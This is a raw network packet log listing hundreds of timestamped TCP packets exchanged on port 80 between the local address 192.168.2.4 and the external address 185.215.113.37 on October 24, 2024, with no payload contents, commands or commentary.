Oct 24, 2024 19:29:06.014018059 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:06.034410954 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:06.034497023 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:06.040510893 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:06.040597916 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:06.040735006 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:06.040766001 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:06.040796041 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:06.041013956 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:06.041078091 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:06.840106010 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:06.840246916 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:07.428432941 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:07.434350967 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:07.714376926 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:07.714431047 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:07.714468956 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:07.714503050 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:07.714539051 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:07.714591026 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:07.714643002 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:07.714647055 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:07.714647055 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:07.714673996 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:07.714678049 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:07.714711905 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:07.714715958 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:07.714735031 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:07.714751959 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:07.714767933 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:07.714798927 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:07.715482950 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:07.715518951 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:07.715552092 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:07.715564013 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:07.715604067 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:07.715667009 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:07.875632048 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:07.875720978 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:07.875758886 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:07.875792980 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:07.875794888 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:07.875828981 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:07.875864029 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:07.875885963 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:07.875899076 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:07.875921965 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:07.875936031 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:07.875965118 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:07.875972986 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:07.875998974 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:07.876009941 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:07.876028061 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:07.876049042 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:07.876064062 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:07.876100063 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:07.876683950 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:07.876749992 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:07.876749992 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:07.876787901 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:07.876807928 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:07.876823902 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:07.876841068 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:07.876862049 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:07.876876116 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:07.876909018 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:07.877548933 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:07.877614975 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:07.877619028 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:07.877655983 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:07.877672911 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:07.877727032 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:07.877758980 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:07.877799988 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:07.877815008 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:07.877846956 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:07.878609896 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:07.878674984 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:07.878705978 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:07.878772020 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.033282042 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.033301115 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.033332109 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.033345938 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.033356905 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.033360958 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.033379078 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.033389091 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.033437014 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.033457994 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.033473969 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.033512115 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.034148932 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.034163952 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.034193993 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.034208059 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.034209013 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.034228086 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.034246922 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.034282923 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.034851074 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.034894943 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.034908056 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.034910917 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.034938097 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.034957886 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.035479069 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.035494089 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.035552979 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.035655022 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.035670996 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.035686970 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.035708904 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.035764933 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.036166906 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.036183119 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.036211967 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.036226988 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.036235094 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.036243916 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.036276102 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.036314964 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.037035942 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.037065029 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.037080050 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.037095070 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.037110090 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.037111044 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.037142038 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.037182093 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.037807941 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.037822962 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.037837982 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.037868023 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.037899971 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.037946939 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.037962914 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.038018942 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.038696051 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.038712025 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.038726091 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.038742065 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.038755894 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.038796902 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.150660038 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.150710106 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.150732040 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.150753021 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.150774002 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.150800943 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.150840998 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.150851965 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.150867939 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.150898933 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.150945902 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.151010036 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.192727089 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.192744017 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.192754984 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.192853928 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.192909956 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.193766117 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.193787098 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.193820000 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.193829060 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.193833113 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.193846941 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.193861961 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.193865061 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.193877935 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.193896055 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.193907976 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.193918943 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.193931103 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.193932056 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.193944931 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.193945885 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.193959951 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.193968058 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.193972111 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.193984032 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.193998098 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.194015026 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.194020987 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.194041967 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.194056034 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.194067955 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.194078922 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.194097996 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.194106102 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.194112062 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.194125891 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.194129944 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.194144011 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.194152117 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.194181919 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.194221020 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.194327116 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.194339037 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.194350004 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.194377899 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.194417953 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.194982052 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.194996119 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.195007086 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.195044994 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.195072889 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.195081949 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.195086002 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.195099115 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.195115089 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.195125103 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.195162058 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.195204020 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.195215940 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.195225954 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.195245981 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.195267916 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.196074009 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.196086884 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.196098089 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.196144104 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.196253061 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.196265936 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.196276903 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.196289062 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.196300983 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.196312904 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.196312904 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.196336031 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.196367025 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.196727037 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.196784019 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.196789980 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.196800947 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.196834087 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.196854115 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.196858883 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.196871042 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.196882010 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.196893930 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.196907997 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.196923971 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.196962118 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.197052956 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.197065115 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.197077036 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.197108030 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.197137117 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.197779894 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.197793007 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.197803974 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.197840929 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.197849989 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.197865009 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.197875023 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.197875023 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.197889090 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.197896957 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.197902918 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.197922945 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.197968960 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.197978973 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.197983027 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.198009014 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.198045969 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.198901892 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.198914051 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.198925018 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.198930979 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.198967934 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.198998928 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.199053049 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.199065924 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.199076891 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.199090004 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.199099064 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.199100971 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.199115038 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.199136972 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.199172974 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.199606895 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.199668884 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.199820995 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.199834108 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.199851990 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.199882030 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.199918032 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.268088102 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.268193007 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.268233061 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.268244028 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.268281937 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.268286943 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.268304110 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.268325090 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.268337965 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.268359900 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.268373966 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.268394947 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.268405914 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.268430948 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.268443108 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.268466949 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.268477917 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.268516064 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.268531084 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.268574953 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.268589973 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.268637896 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.352737904 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.352762938 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.352790117 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.352813959 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.352813959 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.352839947 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.352876902 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.353174925 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.353192091 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.353208065 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.353224993 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.353235006 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.353243113 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.353255987 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.353272915 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.353281975 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.353308916 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.353338957 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.353346109 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.353368998 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.353385925 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.353387117 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.353404045 CEST	80	49730	185.215.113.37	192.168.2.4
